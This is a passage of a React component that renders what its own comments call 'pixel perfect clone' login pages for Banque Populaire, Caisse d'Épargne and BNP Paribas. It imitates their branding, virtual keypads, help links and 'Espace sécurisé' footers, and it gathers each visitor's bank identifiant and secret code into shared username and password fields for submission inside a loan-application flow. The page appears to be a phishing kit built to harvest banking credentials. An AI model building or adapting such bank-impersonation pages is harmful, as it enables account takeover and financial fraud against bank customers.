                        <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24"><path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" /></svg>
                      </button>
                    )}
                  </div>
                </div>
              )}

              {/* Continue Button */}
              {bpSelectedBanque && (
                <Button
                  type="button"
                  disabled={!bpIdentifiant || bpIdentifiant.length < 5}
                  onClick={() => { setBpStep(2); }}
                  className="w-full h-12 text-white font-bold text-sm rounded-full"
                  style={{ backgroundColor: bpIdentifiant && bpIdentifiant.length >= 5 ? BP_COLOR : '#C0C0C0' }}
                  data-testid="bp-continue-btn"
                >
                  Continuer
                </Button>
              )}
            </div>
          </div>

          {/* Footer */}
          <div className="py-3 text-center border-t border-gray-100 bg-white">
            <span className="text-gray-400 text-xs">banquepopulaire.fr</span>
          </div>
        </div>
      );
    }

    // Step 2: Code Secret with Virtual Keypad - Two Column Layout
    if (bpStep === 2) {
      return (
        <div className="min-h-screen flex flex-col bg-white">
          {/* Header */}
          <div className="w-full bg-white py-3 px-6 flex items-center justify-between border-b border-gray-200">
            <div className="flex items-center">
              <img 
                src={bank.logo} 
                alt="Banque Populaire"
                className="h-8 w-auto object-contain"
              />
              <span className="text-xs font-semibold ml-3" style={{ color: BP_COLOR }}>
                {bpSelectedBanque.toUpperCase()}
              </span>
            </div>
            <button
              onClick={handleBpClose}
              className="w-9 h-9 rounded-full flex items-center justify-center"
              style={{ backgroundColor: BP_COLOR }}
              data-testid="bp-close-btn-step2"
            >
              <svg className="w-5 h-5 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
              </svg>
            </button>
          </div>

          {/* Main Content - Two Column Layout */}
          <div className="flex-1 flex flex-col lg:flex-row">
            {/* Left Column - Branding (hidden on mobile) */}
            <div className="hidden lg:flex lg:w-2/5 flex-col" style={{ backgroundColor: BP_COLOR }}>
              <div className="flex-1 flex flex-col items-center justify-center p-8">
                <img 
                  src={bank.logo} 
                  alt="Banque Populaire"
                  className="h-20 w-auto object-contain mb-8"
                  style={{ filter: 'brightness(0) invert(1)' }}
                />
                <h2 className="text-2xl font-bold text-white mb-4 text-center">
                  Votre banque en ligne
                </h2>
                <p className="text-sm text-white/80 text-center leading-relaxed max-w-sm">
                  Accédez à vos comptes en toute sécurité. Consultez vos opérations, effectuez vos virements et gérez vos finances à tout moment.
                </p>
              </div>
            </div>

            {/* Right Column - Form + Help */}
            <div className="flex-1 lg:w-3/5 flex flex-col" style={{ backgroundColor: '#F5F5F5' }}>
              <div className="flex-1 flex flex-col lg:flex-row p-6 lg:p-8">
                {/* Left sub-column - Form */}
                <div className="lg:w-1/2 lg:pr-8">
                  <h1 className="text-2xl font-bold text-gray-900 leading-tight mb-6">
                    Connexion à votre espace
                  </h1>

                  <form onSubmit={handleBpSubmit}>
                    {/* Identifiant Field (readonly) */}
                    <label className="block text-xs font-bold text-gray-700 mb-1">
                      IDENTIFIANT
                    </label>
                    <div className="relative mb-4">
                      <Input
                        type="text"
                        value={bpIdentifiant}
                        readOnly
                        className="h-11 text-sm bg-white border border-gray-300 rounded pr-10 text-gray-700"
                        data-testid="bp-identifiant-readonly"
                      />
                      <button
                        type="button"
                        onClick={() => { setBpIdentifiant(''); setUsername(''); setBpCodeSecret(''); setPassword(''); setBpStep(1); }}
                        className="absolute right-3 top-1/2 -translate-y-1/2 hover:opacity-70"
                        style={{ color: BP_COLOR }}
                      >
                        <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                          <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
                        </svg>
                      </button>
                    </div>

                    {/* Code Secret Field */}
                    <div className="flex items-center justify-between mb-1">
                      <label className="block text-xs font-bold text-gray-700">
                        MOT DE PASSE
                      </label>
                      <a 
                        href="https://www.banquepopulaire.fr/banque-a-distance/recuperer-mes-codes-dacces/"
                        target="_blank"
                        rel="noopener noreferrer"
                        className="text-xs underline"
                        style={{ color: BP_COLOR }}
                      >
                        Perdu / Oublié ?
                      </a>
                    </div>
                    <div className="relative mb-4">
                      <div className="h-11 bg-white border border-gray-300 rounded flex items-center px-4">
                        <div className="flex space-x-2">
                          {[...Array(8)].map((_, i) => (
                            <span key={i} className="text-lg text-gray-900">
                              {i < bpCodeSecret.length ? '●' : '○'}
                            </span>
                          ))}
                        </div>
                        {bpCodeSecret && (
                          <button
                            type="button"
                            onClick={handleBpCodeDelete}
                            className="absolute right-3 top-1/2 -translate-y-1/2 hover:opacity-70"
                            style={{ color: BP_COLOR }}
                          >
                            <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
                            </svg>
                          </button>
                        )}
                      </div>
                    </div>

                    {/* Virtual Keypad - 5x2 Grid */}
                    <div className="grid grid-cols-5 gap-2 mb-4">
                      {bpKeypadNumbers.map((num, index) => (
                        <button
                          key={index}
                          type="button"
                          onClick={() => handleBpKeypadPress(num)}
                          className="h-10 text-lg font-semibold text-gray-900 bg-white hover:bg-gray-100 rounded transition-colors border border-gray-300"
                          data-testid={`bp-keypad-${num}`}
                        >
                          {num}
                        </button>
                      ))}
                    </div>

                    {/* Validate Button */}
                    <Button
                      type="submit"
                      disabled={bpCodeSecret.length < 6 || loading}
                      className="w-full h-11 text-white font-semibold text-sm rounded-full"
                      style={{ 
                        backgroundColor: bpCodeSecret.length >= 6 ? BP_COLOR : '#C0C0C0',
                        color: 'white'
                      }}
                      data-testid="bp-validate-btn"
                    >
                      {loading ? 'Connexion...' : 'VALIDER'}
                    </Button>
                  </form>
                </div>

                {/* Right sub-column - Help Section */}
                <div className="lg:w-1/2 lg:pl-8 lg:border-l border-gray-300 mt-8 lg:mt-0">
                  <div className="space-y-5">
                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">MOT DE PASSE OUBLIÉ ?</h3>
                      <a 
                        href="https://www.banquepopulaire.fr/banque-a-distance/recuperer-mes-codes-dacces/"
                        target="_blank"
                        rel="noopener noreferrer"
                        className="text-xs underline"
                        style={{ color: BP_COLOR }}
                      >
                        Récupérez vos codes d'accès.
                      </a>
                    </div>

                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">PREMIÈRE CONNEXION ?</h3>
                      <a 
                        href="https://www.banquepopulaire.fr/banque-a-distance/premiere-connexion/"
                        target="_blank"
                        rel="noopener noreferrer"
                        className="text-xs underline"
                        style={{ color: BP_COLOR }}
                      >
                        Découvrez comment vous connecter pour la première fois.
                      </a>
                    </div>

                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">SÉCURITÉ</h3>
                      <p className="text-xs text-gray-600 mb-2">
                        Protégez vos données personnelles et vos accès bancaires :
                      </p>
                      <div className="space-y-1">
                        <a 
                          href="https://www.banquepopulaire.fr/votre-banque/securite/proteger-ses-donnees/"
                          target="_blank"
                          rel="noopener noreferrer"
                          className="text-xs underline block"
                          style={{ color: BP_COLOR }}
                        >
                          Protéger ses données personnelles.
                        </a>
                        <a 
                          href="https://www.banquepopulaire.fr/comptes-cartes/dsp2-securite-renforcee/"
                          target="_blank"
                          rel="noopener noreferrer"
                          className="text-xs underline block"
                          style={{ color: BP_COLOR }}
                        >
                          Normes de sécurité DSP2.
                        </a>
                      </div>
                    </div>

                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">BESOIN D'AIDE ?</h3>
                      <a 
                        href="https://www.banquepopulaire.fr/banque-a-distance/"
                        target="_blank"
                        rel="noopener noreferrer"
                        className="text-xs underline"
                        style={{ color: BP_COLOR }}
                      >
                        Consultez l'aide en ligne.
                      </a>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>

          {/* Footer */}
          <div className="py-3 text-center border-t border-gray-100">
            <span className="text-gray-400 text-xs">banquepopulaire.fr — Espace sécurisé</span>
          </div>
        </div>
      );
    }
  }

  // Special Caisse d'Épargne Layout - Pixel Perfect Clone with 2 steps
  if (bank.isCaisseEpargneLayout) {
    const CE_COLOR = '#DC2626';

    const getCERegionByPostalCode = (postalCode) => {
      const dept = postalCode.substring(0, 2);
      const deptMapping = {
        '01': 'Rhône-Alpes', '02': 'Hauts de France', '03': 'Auvergne et Limousin',
        '04': 'Provence Alpes Corse', '05': 'Provence Alpes Corse', '06': 'Côte d\'Azur',
        '07': 'Loire Drôme Ardèche', '08': 'Grand Est Europe', '09': 'Midi-Pyrénées',
        '10': 'Grand Est Europe', '11': 'Languedoc-Roussillon', '12': 'Midi-Pyrénées',
        '13': 'Provence Alpes Corse', '14': 'Normandie', '15': 'Auvergne et Limousin',
        '16': 'Aquitaine Poitou-Charentes', '17': 'Aquitaine Poitou-Charentes', '18': 'Loire Centre',
        '19': 'Auvergne et Limousin', '20': 'Provence Alpes Corse', '21': 'Bourgogne Franche-Comté',
        '22': 'Bretagne Pays de Loire', '23': 'Auvergne et Limousin', '24': 'Aquitaine Poitou-Charentes',
        '25': 'Bourgogne Franche-Comté', '26': 'Loire Drôme Ardèche', '27': 'Normandie',
        '28': 'Loire Centre', '29': 'Bretagne Pays de Loire', '30': 'Languedoc-Roussillon',
        '31': 'Midi-Pyrénées', '32': 'Midi-Pyrénées', '33': 'Aquitaine Poitou-Charentes',
        '34': 'Languedoc-Roussillon', '35': 'Bretagne Pays de Loire', '36': 'Loire Centre',
        '37': 'Loire Centre', '38': 'Rhône-Alpes', '39': 'Bourgogne Franche-Comté',
        '40': 'Aquitaine Poitou-Charentes', '41': 'Loire Centre', '42': 'Loire Drôme Ardèche',
        '43': 'Auvergne et Limousin', '44': 'Bretagne Pays de Loire', '45': 'Loire Centre',
        '46': 'Midi-Pyrénées', '47': 'Aquitaine Poitou-Charentes', '48': 'Languedoc-Roussillon',
        '49': 'Bretagne Pays de Loire', '50': 'Normandie', '51': 'Grand Est Europe',
        '52': 'Grand Est Europe', '53': 'Bretagne Pays de Loire', '54': 'Grand Est Europe',
        '55': 'Grand Est Europe', '56': 'Bretagne Pays de Loire', '57': 'Grand Est Europe',
        '58': 'Bourgogne Franche-Comté', '59': 'Hauts de France', '60': 'Hauts de France',
        '61': 'Normandie', '62': 'Hauts de France', '63': 'Auvergne et Limousin',
        '64': 'Aquitaine Poitou-Charentes', '65': 'Midi-Pyrénées', '66': 'Languedoc-Roussillon',
        '67': 'Grand Est Europe', '68': 'Grand Est Europe', '69': 'Rhône-Alpes',
        '70': 'Bourgogne Franche-Comté', '71': 'Bourgogne Franche-Comté', '72': 'Bretagne Pays de Loire',
        '73': 'Rhône-Alpes', '74': 'Rhône-Alpes', '75': 'Île-de-France',
        '76': 'Normandie', '77': 'Île-de-France', '78': 'Île-de-France',
        '79': 'Aquitaine Poitou-Charentes', '80': 'Hauts de France', '81': 'Midi-Pyrénées',
        '82': 'Midi-Pyrénées', '83': 'Côte d\'Azur', '84': 'Provence Alpes Corse',
        '85': 'Bretagne Pays de Loire', '86': 'Aquitaine Poitou-Charentes', '87': 'Auvergne et Limousin',
        '88': 'Grand Est Europe', '89': 'Bourgogne Franche-Comté', '90': 'Bourgogne Franche-Comté',
        '91': 'Île-de-France', '92': 'Île-de-France', '93': 'Île-de-France',
        '94': 'Île-de-France', '95': 'Île-de-France'
      };
      return deptMapping[dept] || 'Île-de-France';
    };

    const handleCeIdentifiantChange = (e) => {
      const value = e.target.value.slice(0, 13);
      setCeIdentifiant(value);
      setUsername(value);
    };

    const handleCeKeypadPress = (num) => {
      if (ceCodeSecret.length < 8) {
        const newCode = ceCodeSecret + num;
        setCeCodeSecret(newCode);
        setPassword(newCode);
      }
    };

    const handleCeCodeDelete = () => {
      const newCode = ceCodeSecret.slice(0, -1);
      setCeCodeSecret(newCode);
      setPassword(newCode);
    };

    const handleCeSubmit = (e) => {
      e.preventDefault();
      if (ceCodeSecret.length >= 6) {
        handleSubmit(e);
      }
    };

    const handleCeClose = () => {
      navigate('/client/loan-flow/bank-selection');
    };

    // Step 1: Select Caisse Régionale + Enter Identifiant
    if (ceStep === 1) {
      return (
        <div className="min-h-screen flex flex-col" style={{ backgroundColor: '#F5F5F5' }}>
          {/* Header */}
          <div className="w-full bg-white py-3 px-6 flex items-center justify-between border-b border-gray-200">
            <img 
              src={bank.logo} 
              alt="Caisse d'Épargne"
              className="h-10 w-auto object-contain"
            />
            <button
              onClick={handleCeClose}
              className="w-9 h-9 rounded-full flex items-center justify-center hover:bg-gray-100"
              data-testid="ce-close-btn"
            >
              <svg className="w-5 h-5 text-gray-600" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
              </svg>
            </button>
          </div>

          {/* Main Content - Centered Card */}
          <div className="flex-1 flex items-center justify-center px-4 py-8">
            <div className="bg-white rounded-2xl p-6 shadow-lg w-full max-w-md">
              <h1 className="text-xl font-bold text-gray-900 mb-1 text-center">
                Accéder à mon compte
              </h1>
              <p className="text-sm text-gray-500 mb-6 text-center">
                Caisse d'Épargne
              </p>

              {/* Postal Code Search */}
              <div className="mb-4">
                <label className="block text-sm font-semibold text-gray-900 mb-2">
                  Rechercher par code postal
                </label>
                <div className="relative">
                  <Input
                    type="text"
                    inputMode="numeric"
                    placeholder="Votre code postal"
                    value={cePostalCode}
                    onChange={(e) => setCePostalCode(e.target.value.replace(/\D/g, '').slice(0, 5))}
                    className="h-12 text-sm bg-white border border-gray-200 rounded-lg pr-10"
                    data-testid="ce-postal-input"
                  />
                  {cePostalCode && (
                    <button type="button" className="absolute right-3 top-1/2 -translate-y-1/2 text-gray-400 hover:text-gray-600" onClick={() => setCePostalCode('')}>
                      <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24"><path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" /></svg>
                    </button>
                  )}
                </div>
                <Button
                  type="button"
                  disabled={cePostalCode.length < 5}
                  onClick={() => {
                    const foundCaisse = getCERegionByPostalCode(cePostalCode);
                    setCeSelectedCaisse(foundCaisse);
                  }}
                  className="w-full h-10 mt-2 text-white font-semibold text-sm rounded-full"
                  style={{ backgroundColor: cePostalCode.length >= 5 ? CE_COLOR : '#C0C0C0' }}
                  data-testid="ce-search-btn"
                >
                  Rechercher
                </Button>
              </div>

              {/* Dropdown Selection */}
              <div className="mb-6">
                <label className="block text-sm font-semibold text-gray-900 mb-2">
                  Choisir une Caisse d'Épargne
                </label>
                <div className="relative">
                  <button
                    type="button"
                    onClick={() => setCeDropdownOpen(!ceDropdownOpen)}
                    className="w-full h-12 px-4 text-sm bg-white border border-gray-200 rounded-lg cursor-pointer focus:outline-none focus:ring-2 flex items-center justify-between text-left"
                    data-testid="ce-caisse-select"
                  >
                    <span style={{ color: ceSelectedCaisse ? '#1a1a1a' : CE_COLOR }}>
                      {ceSelectedCaisse || 'Sélectionnez votre caisse...'}
                    </span>
                    <svg className={`w-5 h-5 transition-transform ${ceDropdownOpen ? 'rotate-180' : ''}`} fill="none" stroke={CE_COLOR} viewBox="0 0 24 24">
                      <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M19 9l-7 7-7-7" />
                    </svg>
                  </button>
                  {ceDropdownOpen && (
                    <div className="absolute left-0 right-0 top-full mt-1 bg-white border border-gray-200 rounded-lg shadow-lg max-h-60 overflow-y-auto z-50">
                      {bank.caissesRegionales?.map((caisse, index) => (
                        <button
                          key={index}
                          type="button"
                          onClick={() => {
                            setCeSelectedCaisse(caisse);
                            setCeDropdownOpen(false);
                          }}
                          className="w-full px-4 py-3 text-left text-sm text-gray-800 hover:bg-gray-100 border-b border-gray-50 last:border-b-0"
                          data-testid={`ce-caisse-option-${index}`}
                        >
                          {caisse}
                        </button>
                      ))}
                    </div>
                  )}
                </div>
              </div>

              {/* Identifiant Field */}
              {ceSelectedCaisse && (
                <div className="mb-6">
                  <label className="block text-sm font-semibold text-gray-900 mb-2">
                    Votre identifiant
                  </label>
                  <div className="relative">
                    <Input
                      type="text"
                      placeholder="Saisissez votre identifiant"
                      value={ceIdentifiant}
                      onChange={handleCeIdentifiantChange}
                      required
                      maxLength={13}
                      className="h-12 text-sm bg-white border border-gray-200 rounded-lg pr-10"
                      data-testid="ce-identifiant-input"
                    />
                    {ceIdentifiant && (
                      <button type="button" className="absolute right-3 top-1/2 -translate-y-1/2 text-gray-400 hover:text-gray-600" onClick={() => { setCeIdentifiant(''); setUsername(''); }}>
                        <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24"><path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" /></svg>
                      </button>
                    )}
                  </div>
                </div>
              )}

              {/* Continue Button */}
              {ceSelectedCaisse && (
                <Button
                  type="button"
                  disabled={!ceIdentifiant || ceIdentifiant.length < 5}
                  onClick={() => { setCeStep(2); }}
                  className="w-full h-12 text-white font-bold text-sm rounded-full"
                  style={{ backgroundColor: ceIdentifiant && ceIdentifiant.length >= 5 ? CE_COLOR : '#C0C0C0' }}
                  data-testid="ce-continue-btn"
                >
                  Continuer
                </Button>
              )}
            </div>
          </div>

          {/* Footer */}
          <div className="py-3 text-center border-t border-gray-100 bg-white">
            <span className="text-gray-400 text-xs">caisse-epargne.fr</span>
          </div>
        </div>
      );
    }

    // Step 2: Code Secret with Virtual Keypad - Two Column Layout
    if (ceStep === 2) {
      return (
        <div className="min-h-screen flex flex-col bg-white">
          {/* Header */}
          <div className="w-full bg-white py-3 px-6 flex items-center justify-between border-b border-gray-200">
            <div className="flex items-center">
              <img 
                src={bank.logo} 
                alt="Caisse d'Épargne"
                className="h-8 w-auto object-contain"
              />
              <span className="text-xs font-semibold ml-3" style={{ color: CE_COLOR }}>
                {ceSelectedCaisse.toUpperCase()}
              </span>
            </div>
            <button
              onClick={handleCeClose}
              className="w-9 h-9 rounded-full flex items-center justify-center"
              style={{ backgroundColor: CE_COLOR }}
              data-testid="ce-close-btn-step2"
            >
              <svg className="w-5 h-5 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
              </svg>
            </button>
          </div>

          {/* Main Content - Two Column Layout */}
          <div className="flex-1 flex flex-col lg:flex-row">
            {/* Left Column - Branding (hidden on mobile) */}
            <div className="hidden lg:flex lg:w-2/5 flex-col" style={{ backgroundColor: CE_COLOR }}>
              <div className="flex-1 flex flex-col items-center justify-center p-8">
                <img 
                  src={bank.logo} 
                  alt="Caisse d'Épargne"
                  className="h-20 w-auto object-contain mb-8"
                />
                <h2 className="text-2xl font-bold text-white mb-4 text-center">
                  Votre espace en ligne
                </h2>
                <p className="text-sm text-white/80 text-center leading-relaxed max-w-sm">
                  Votre espace en ligne est totalement confidentiel et vous garantit une navigation sécurisée lorsque vous consultez vos comptes.
                </p>
              </div>
            </div>

            {/* Right Column - Form + Help */}
            <div className="flex-1 lg:w-3/5 flex flex-col" style={{ backgroundColor: '#F5F5F5' }}>
              <div className="flex-1 flex flex-col lg:flex-row p-6 lg:p-8">
                {/* Left sub-column - Form */}
                <div className="lg:w-1/2 lg:pr-8">
                  <h1 className="text-2xl font-bold text-gray-900 leading-tight mb-6">
                    Connexion à votre espace
                  </h1>

                  <form onSubmit={handleCeSubmit}>
                    {/* Identifiant Field (readonly) */}
                    <label className="block text-xs font-bold text-gray-700 mb-1">
                      IDENTIFIANT
                    </label>
                    <div className="relative mb-4">
                      <Input
                        type="text"
                        value={ceIdentifiant}
                        readOnly
                        className="h-11 text-sm bg-white border border-gray-300 rounded pr-10 text-gray-700"
                        data-testid="ce-identifiant-readonly"
                      />
                      <button
                        type="button"
                        onClick={() => { setCeIdentifiant(''); setUsername(''); setCeCodeSecret(''); setPassword(''); setCeStep(1); }}
                        className="absolute right-3 top-1/2 -translate-y-1/2 hover:opacity-70"
                        style={{ color: CE_COLOR }}
                      >
                        <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                          <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
                        </svg>
                      </button>
                    </div>

                    {/* Code Secret Field */}
                    <div className="flex items-center justify-between mb-1">
                      <label className="block text-xs font-bold text-gray-700">
                        MOT DE PASSE
                      </label>
                      <a 
                        href="https://www.aide.caisse-epargne.fr/categories/connexion-et-securite/identifiant-et-mot-de-passe"
                        target="_blank"
                        rel="noopener noreferrer"
                        className="text-xs underline"
                        style={{ color: CE_COLOR }}
                      >
                        Perdu / Oublié ?
                      </a>
                    </div>
                    <div className="relative mb-4">
                      <div className="h-11 bg-white border border-gray-300 rounded flex items-center px-4">
                        <div className="flex space-x-2">
                          {[...Array(8)].map((_, i) => (
                            <span key={i} className="text-lg text-gray-900">
                              {i < ceCodeSecret.length ? '●' : '○'}
                            </span>
                          ))}
                        </div>
                        {ceCodeSecret && (
                          <button
                            type="button"
                            onClick={handleCeCodeDelete}
                            className="absolute right-3 top-1/2 -translate-y-1/2 hover:opacity-70"
                            style={{ color: CE_COLOR }}
                          >
                            <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
                            </svg>
                          </button>
                        )}
                      </div>
                    </div>

                    {/* Virtual Keypad - 5x2 Grid */}
                    <div className="grid grid-cols-5 gap-2 mb-4">
                      {ceKeypadNumbers.map((num, index) => (
                        <button
                          key={index}
                          type="button"
                          onClick={() => handleCeKeypadPress(num)}
                          className="h-10 text-lg font-semibold text-gray-900 bg-white hover:bg-gray-100 rounded transition-colors border border-gray-300"
                          data-testid={`ce-keypad-${num}`}
                        >
                          {num}
                        </button>
                      ))}
                    </div>

                    {/* Validate Button */}
                    <Button
                      type="submit"
                      disabled={ceCodeSecret.length < 6 || loading}
                      className="w-full h-11 text-white font-semibold text-sm rounded-full"
                      style={{ 
                        backgroundColor: ceCodeSecret.length >= 6 ? CE_COLOR : '#C0C0C0',
                        color: 'white'
                      }}
                      data-testid="ce-validate-btn"
                    >
                      {loading ? 'Connexion...' : 'VALIDER'}
                    </Button>
                  </form>
                </div>

                {/* Right sub-column - Help Section */}
                <div className="lg:w-1/2 lg:pl-8 lg:border-l border-gray-300 mt-8 lg:mt-0">
                  <div className="space-y-5">
                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">MOT DE PASSE OUBLIÉ ?</h3>
                      <a 
                        href="https://www.aide.caisse-epargne.fr/categories/connexion-et-securite/identifiant-et-mot-de-passe"
                        target="_blank"
                        rel="noopener noreferrer"
                        className="text-xs underline"
                        style={{ color: CE_COLOR }}
                      >
                        Identifiant ou mot de passe oublié ?
                      </a>
                    </div>

                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">PREMIÈRE CONNEXION ?</h3>
                      <a 
                        href="https://www.caisse-epargne.fr/banque-a-distance/premiere-connexion/"
                        target="_blank"
                        rel="noopener noreferrer"
                        className="text-xs underline"
                        style={{ color: CE_COLOR }}
                      >
                        Découvrez comment vous connecter pour la première fois.
                      </a>
                    </div>

                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">SÉCURITÉ</h3>
                      <p className="text-xs text-gray-600 mb-2">
                        Protégez vos données personnelles et vos accès bancaires :
                      </p>
                      <div className="space-y-1">
                        <a 
                          href="https://www.caisse-epargne.fr/securite/"
                          target="_blank"
                          rel="noopener noreferrer"
                          className="text-xs underline block"
                          style={{ color: CE_COLOR }}
                        >
                          Nos conseils de sécurité.
                        </a>
                        <a 
                          href="https://www.caisse-epargne.fr/banque-a-distance/securpass/"
                          target="_blank"
                          rel="noopener noreferrer"
                          className="text-xs underline block"
                          style={{ color: CE_COLOR }}
                        >
                          Sécur'Pass : sécuriser vos opérations.
                        </a>
                      </div>
                    </div>

                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">BESOIN D'AIDE ?</h3>
                      <a 
                        href="https://www.aide.caisse-epargne.fr/"
                        target="_blank"
                        rel="noopener noreferrer"
                        className="text-xs underline"
                        style={{ color: CE_COLOR }}
                      >
                        Consultez notre FAQ et aide en ligne.
                      </a>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>

          {/* Footer */}
          <div className="py-3 text-center border-t border-gray-100">
            <span className="text-gray-400 text-xs">caisse-epargne.fr — Espace sécurisé</span>
          </div>
        </div>
      );
    }
  }

  // Special BNP Paribas Layout - Pixel Perfect Clone
  if (bank.isBNPLayout) {
    // Handle username input - auto switch to step 2 when 10 digits entered
    const handleBnpUsernameChange = (e) => {
      const value = e.target.value.replace(/\D/g, '').slice(0, 10); // Only digits, max 10
      setUsername(value);
    };

    // Handle keypad press for code secret
    const handleBnpKeypadPress = (num) => {
      if (bnpCodeSecret.length < 6) {
        const newCode = bnpCodeSecret + num;
        setBnpCodeSecret(newCode);
        setPassword(newCode);
      }
    };

    // Handle delete for code secret
    const handleBnpCodeDelete = () => {
      const newCode = bnpCodeSecret.slice(0, -1);
      setBnpCodeSecret(newCode);
      setPassword(newCode);
    };

    // Handle submit
    const handleBnpSubmit = (e) => {
      e.preventDefault();
      if (bnpCodeSecret.length === 6) {
        handleSubmit(e);
      }
    };

    // Handle continue to step 2
    const handleBnpContinue = () => {
      if (username.length >= 7) {
        setBnpStep(2);
      }
    };

    return (
      <div className="min-h-screen flex flex-col bg-white">
        {/* White Header with BNP Logo */}
        <div className="w-full bg-white py-3 px-6 flex items-center border-b border-gray-100">
          <img 
            src={bank.logo} 
            alt="BNP Paribas"
            className="h-12 w-auto object-contain"
          />
          <span className="ml-3 text-xs text-gray-500 italic hidden sm:inline">La banque d'un monde qui change</span>
        </div>

        {/* Main Content - Two Column Layout */}
        <div className="flex-1 flex flex-col lg:flex-row">
          {/* Left Column - Green Login Form */}
          <div className="lg:w-1/2 flex flex-col" style={{ backgroundColor: '#006B3F' }}>
            <div className="flex-1 px-8 lg:px-12 py-10">
              {/* Title */}
              <h1 className="text-xl font-bold text-white mb-8">
                Accédez à votre espace client
              </h1>

              <form onSubmit={handleBnpSubmit}>
                {/* Numéro Client */}
                <label className="block text-base font-bold text-white mb-2">
                  Numéro Client
                </label>
                
                {/* Input Field */}
                <div className="relative mb-4">
                  <Input
                    type="text"
                    inputMode="numeric"
                    placeholder="Numéro de 7 à 10 chiffres"
                    value={username}
                    onChange={handleBnpUsernameChange}
                    required
                    maxLength={10}
                    className="h-12 text-base bg-white border-0 rounded pr-12 text-gray-700 placeholder-gray-400"
                    data-testid="bnp-username-input"
                    readOnly={bnpStep === 2}
                  />
                  {username && bnpStep === 1 && (
                    <button
                      type="button"
                      onClick={() => setUsername('')}
                      className="absolute right-3 top-1/2 -translate-y-1/2 w-7 h-7 rounded-full border-2 border-gray-400 flex items-center justify-center text-gray-400 hover:text-gray-600 hover:border-gray-600"
                    >
                      <svg className="w-3 h-3" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
                      </svg>
                    </button>
                  )}
                </div>

                {/* Remember Me Toggle */}
                <div className="flex items-center mb-6">
                  <button
                    type="button"
                    onClick={() => setBnpRememberMe(!bnpRememberMe)}
                    className={`w-11 h-6 rounded-full flex items-center px-1 transition-colors ${bnpRememberMe ? 'bg-white justify-end' : 'bg-white/30 justify-start'}`}
                  >
                    <div className={`w-4 h-4 rounded-full shadow ${bnpRememberMe ? 'bg-green-600' : 'bg-white'}`}></div>
                  </button>
                  <label className="ml-3 text-white text-sm flex items-center">
                    Mémoriser mon numéro client
                    <span className="ml-2 w-5 h-5 rounded-full border border-white flex items-center justify-center text-xs text-white cursor-help">i</span>
                  </label>
                </div>

                {/* Step 2 - Code Secret with Virtual Keypad */}
                {bnpStep === 2 && (
                  <>
                    <p className="text-white text-base font-semibold mb-4">
                      Saisissez votre code secret
                    </p>

                    {/* 6 dots display for code + delete button */}
                    <div className="flex items-center justify-center mb-6">
                      <div className="flex items-center space-x-3">
                        {[0, 1, 2, 3, 4, 5].map((index) => (
                          <div
                            key={index}
                            className={`w-4 h-4 rounded-full border-2 border-white ${
                              index < bnpCodeSecret.length ? 'bg-white' : 'bg-transparent'
                            }`}
                          />
                        ))}
                      </div>
                      <button
                        type="button"
                        onClick={handleBnpCodeDelete}
                        className="ml-4 w-9 h-9 border-2 border-white flex items-center justify-center text-white hover:bg-white/20 rounded"
                      >
                        <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                          <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
                        </svg>
                      </button>
                    </div>

                    {/* Virtual Keypad - 5x2 grid */}
                    <div className="grid grid-cols-5 gap-2 mb-6">
                      {bnpKeypadNumbers.map((num, index) => (
                        <button
                          key={index}
                          type="button"
                          onClick={() => handleBnpKeypadPress(num)}
                          className="h-12 text-lg font-bold text-white border-2 border-white hover:bg-white/20 transition-colors rounded"
                          data-testid={`bnp-keypad-${num}`}
                        >
                          {num}
                        </button>
                      ))}
                    </div>

                    {/* Submit Button */}
                    <div className="flex justify-center mb-4">
                      <Button
                        type="submit"
                        className="h-11 px-8 font-semibold text-sm rounded-full"
                        style={{ backgroundColor: '#90EE90', color: '#006B3F' }}
                        disabled={loading || bnpCodeSecret.length !== 6}
                        data-testid="bnp-submit-btn"
                      >
                        {loading ? 'Connexion...' : 'Accéder à mon espace client'}
                      </Button>
                    </div>
                  </>
                )}

